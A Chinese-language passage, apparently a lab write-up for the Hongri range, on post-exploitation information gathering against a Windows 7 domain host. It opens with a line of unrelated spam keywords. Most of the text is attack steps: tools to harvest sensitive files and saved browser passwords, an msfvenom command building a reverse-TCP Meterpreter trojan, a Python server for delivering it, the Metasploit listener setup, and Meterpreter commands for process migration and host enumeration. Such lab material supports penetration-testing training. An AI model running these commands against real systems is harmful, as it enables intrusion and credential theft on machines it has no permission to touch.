宁夏微信网站建设,wordpress 公式,购物网站排名2015,如何在手机上做微电影网站文章目录 一、配置文件敏感信息收集二、浏览器密码记录三、MSF信息收集 域控#xff1a;windows server 2008 域内机器#xff1a;win7 攻击机#xff1a;kali 就是红日靶场#xff08;一#xff09;的虚拟机。 一、配置文件敏感信息收集
使用searchall64.exe#… 文章目录 一、配置文件敏感信息收集二、浏览器密码记录三、MSF信息收集 域控windows server 2008 域内机器win7 攻击机kali 就是红日靶场一的虚拟机。 一、配置文件敏感信息收集
使用searchall64.exe下图在win7上用的是3.5.63.5.9用不了会报错。
searchall64.exe -p c:// # 收集C盘下的敏感信息二、浏览器密码记录
使用hack-browser-data-windows-64bit.exe同样这里是在win7上运行v0.4.3可用v0.4.5用不了。
三、MSF信息收集
1、生成反弹木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.92.6 LPORT4444 -f exe -o reverse_shell.exe2、kali开启http服务win7下载反弹shell
python3 -m http.server 99993、kali开始监听使用msf
msfconsole # 在命令行里面输入命令进入msf漏洞利用框架
use exploit/multi/handler # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp # 设置payload不同的木马设置不同的payload设置payload时要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6 # 我们的kali本机ip
set lport 4444 # 我们的kali本机端口
exploit # 开始进行监听在win7上运行反弹shelltest.exe即可获取win7的shell。 注入到新的进程
getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P pid # 迁移到相应pid的进程中进入受害机shell
shell # 进入shell
chcp 65001 # 修改编码解决控制台乱码问题获取目标机器的分区信息
run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息判断是否是虚拟机
run post/windows/gather/checkvm # 判断是否是虚拟机开启了什么服务
run post/windows/gather/enum_services # 开启了什么服务安装了什么应用
run post/windows/gather/enum_applications # 安装了什么应用获取主机最近的系统操作
post/windows/gather/dumplinks # 获取主机最近的系统操作查看补丁
run post/windows/gather/enum_patches #查看补丁